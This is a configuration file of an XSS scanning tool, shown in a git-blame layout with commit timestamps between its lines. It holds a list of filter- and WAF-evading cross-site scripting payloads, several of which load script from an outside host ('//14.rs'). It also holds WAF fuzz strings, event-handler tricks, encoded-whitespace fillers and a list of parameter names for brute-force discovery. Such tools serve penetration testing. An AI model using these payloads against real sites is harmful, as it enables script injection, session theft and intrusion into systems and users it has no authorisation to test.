changes = '''ability to load seeds from file;show parameter name while bruteforcing;fixed payload display while using POST method'''
|
2018-11-11 15:16:27 +05:30
|
|
|
|
2018-11-12 14:05:49 +05:30
|
|
|
defaultEditor = 'nano'
|
2018-11-16 21:13:45 +05:30
|
|
|
blindPayload = '' # your blind XSS payload
|
|
|
|
|
xsschecker = 'v3dm0s' # A non malicious string to check for reflections and stuff
|
2018-10-27 18:58:52 +05:30
|
|
|
|
2018-11-15 15:41:01 +05:30
|
|
|
# More information on adding proxies: http://docs.python-requests.org/en/master/user/advanced/#proxies
|
2018-11-16 21:13:45 +05:30
|
|
|
proxies = {'http': 'http://0.0.0.0:8080', 'https': 'http://0.0.0.0:8080'}
|
2018-11-14 10:50:22 +05:30
|
|
|
|
2018-11-16 21:13:45 +05:30
|
|
|
minEfficiency = 90 # payloads below this efficiency will not be displayed
|
2018-10-27 18:58:52 +05:30
|
|
|
|
2018-11-16 21:13:45 +05:30
|
|
|
delay = 0 # default delay between http requests
|
|
|
|
|
threadCount = 10 # default number of threads
|
|
|
|
|
timeout = 10 # default number of http request timeout
|
2018-10-27 18:58:52 +05:30
|
|
|
|
2018-11-16 21:13:45 +05:30
|
|
|
# attributes that have special properties
|
2018-11-03 22:49:40 +05:30
|
|
|
specialAttributes = ['srcdoc', 'src']
|
|
|
|
|
|
2018-11-16 21:13:45 +05:30
|
|
|
badTags = ('iframe', 'title', 'textarea', 'noembed',
|
|
|
|
|
'style', 'template', 'noscript')
|
2018-10-27 18:58:52 +05:30
|
|
|
|
2018-11-16 21:13:45 +05:30
|
|
|
tags = ('html', 'd3v', 'a', 'details') # HTML Tags
|
2018-10-27 18:58:52 +05:30
|
|
|
|
2018-11-16 21:13:45 +05:30
|
|
|
# "Things" that can be used between js functions and breakers e.g. '};alert()//
|
2018-10-27 18:58:52 +05:30
|
|
|
jFillings = ('-', '*', ';', '/')
|
2018-11-16 21:13:45 +05:30
|
|
|
# "Things" that can be used before > e.g. <tag attr=value%0dx>
|
|
|
|
|
lFillings = ('', '%0dx')
|
|
|
|
|
# "Things" to use between event handler and = or between function and =
|
|
|
|
|
eFillings = ('%09', '%0a', '%0d', '+')
|
|
|
|
|
fillings = ('%09', '%0a', '%0d', '/+/') # "Things" to use instead of space
|
2018-10-27 18:58:52 +05:30
|
|
|
|
2018-11-16 21:13:45 +05:30
|
|
|
eventHandlers = { # Event handlers and the tags compatible with them
|
|
|
|
|
'ontoggle': ['details'],
|
|
|
|
|
'onpointerenter': ['d3v', 'details', 'html', 'a'],
|
|
|
|
|
'onmouseover': ['a', 'html', 'd3v']
|
2018-10-27 18:58:52 +05:30
|
|
|
}
|
|
|
|
|
|
2018-11-16 21:13:45 +05:30
|
|
|
functions = ( # JavaScript functions to get a popup
|
|
|
|
|
'[8].find(confirm)', 'confirm()',
|
|
|
|
|
'(confirm)()', 'co\u006efir\u006d()',
|
|
|
|
|
'(prompt)``', 'a=prompt,a()')
|
2018-10-27 18:58:52 +05:30
|
|
|
|
2018-11-16 21:13:45 +05:30
|
|
|
payloads = ( # Payloads for filter & WAF evasion
|
|
|
|
|
'\'"</Script><Html Onmouseover=(confirm)()//'
|
|
|
|
|
'<imG/sRc=l oNerrOr=(prompt)() x>',
|
|
|
|
|
'<!--<iMg sRc=--><img src=x oNERror=(prompt)`` x>',
|
|
|
|
|
'<deTails open oNToggle=confi\u0072m()>',
|
|
|
|
|
'<img sRc=l oNerrOr=(confirm)() x>',
|
|
|
|
|
'<svg/x=">"/onload=confirm()//',
|
|
|
|
|
'<svg%0Aonload=%09((pro\u006dpt))()//',
|
|
|
|
|
'<iMg sRc=x:confirm`` oNlOad=e\u0076al(src)>',
|
|
|
|
|
'<sCript x>confirm``</scRipt x>',
|
|
|
|
|
'<Script x>prompt()</scRiPt x>',
|
|
|
|
|
'<sCriPt sRc=//14.rs>',
|
|
|
|
|
'<embed//sRc=//14.rs>',
|
|
|
|
|
'<base href=//14.rs/><script src=/>',
|
|
|
|
|
'<object//data=//14.rs>',
|
|
|
|
|
'<s=" onclick=confirm``>clickme',
|
|
|
|
|
'<svG oNLoad=co\u006efirm(1)>',
|
|
|
|
|
'\'"><y///oNMousEDown=((confirm))()>Click',
|
|
|
|
|
'<a/href=javascript:co\u006efirm("1")>clickme</a>',
|
|
|
|
|
'<img src=x onerror=confir\u006d`1`>',
|
|
|
|
|
'<svg/onload=co\u006efir\u006d`1`>')
|
2018-10-27 18:58:52 +05:30
|
|
|
|
2018-11-16 21:13:45 +05:30
|
|
|
fuzzes = ( # Fuzz strings to test WAFs
|
|
|
|
|
'<test', '<test//', '<test>', '<test x>', '<test x=y', '<test x=y//',
|
|
|
|
|
'<test/oNxX=yYy//', '<test oNxX=yYy>', '<test onload=x', '<test/o%00nload=x',
|
|
|
|
|
'<test sRc=xxx', '<test data=asa', '<test data=javascript:asa', '<svg x=y>',
|
|
|
|
|
'<details x=y//', '<a href=x//', '<emBed x=y>', '<object x=y//', '<bGsOund sRc=x>',
|
|
|
|
|
'<iSinDEx x=y//', '<aUdio x=y>', '<script x=y>', '<script//src=//', '">payload<br/attr="',
|
|
|
|
|
'"-confirm``-"', '<test ONdBlcLicK=x>', '<test/oNcoNTeXtMenU=x>', '<test OndRAgOvEr=x>')
|
2018-10-27 18:58:52 +05:30
|
|
|
|
2018-11-16 21:13:45 +05:30
|
|
|
headers = { # default headers
|
|
|
|
|
'User-Agent': '$',
|
|
|
|
|
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
|
|
|
|
|
'Accept-Language': 'en-US,en;q=0.5',
|
|
|
|
|
'Accept-Encoding': 'gzip,deflate',
|
|
|
|
|
'Connection': 'close',
|
|
|
|
|
'DNT': '1',
|
|
|
|
|
'Upgrade-Insecure-Requests': '1',
|
2018-10-27 18:58:52 +05:30
|
|
|
}
|
|
|
|
|
|
2018-11-16 21:13:45 +05:30
|
|
|
blindParams = ( # common paramtere names to be bruteforced for parameter discovery
|
|
|
|
|
'redirect', 'redir', 'url', 'link', 'goto', 'debug', '_debug', 'test', 'get', 'index', 'src', 'source', 'file',
|
|
|
|
|
'frame', 'config', 'new', 'old', 'var', 'rurl', 'return_to', '_return', 'returl', 'last', 'text', 'load', 'email',
|
|
|
|
|
'mail', 'user', 'username', 'password', 'pass', 'passwd', 'first_name', 'last_name', 'back', 'href', 'ref', 'data', 'input',
|
|
|
|
|
'out', 'net', 'host', 'address', 'code', 'auth', 'userid', 'auth_token', 'token', 'error', 'keyword', 'key', 'q', 'query', 'aid',
|
|
|
|
|
'bid', 'cid', 'did', 'eid', 'fid', 'gid', 'hid', 'iid', 'jid', 'kid', 'lid', 'mid', 'nid', 'oid', 'pid', 'qid', 'rid', 'sid',
|
|
|
|
|
'tid', 'uid', 'vid', 'wid', 'xid', 'yid', 'zid', 'cal', 'country', 'x', 'y', 'topic', 'title', 'head', 'higher', 'lower', 'width',
|
|
|
|
|
'height', 'add', 'result', 'log', 'demo', 'example', 'message')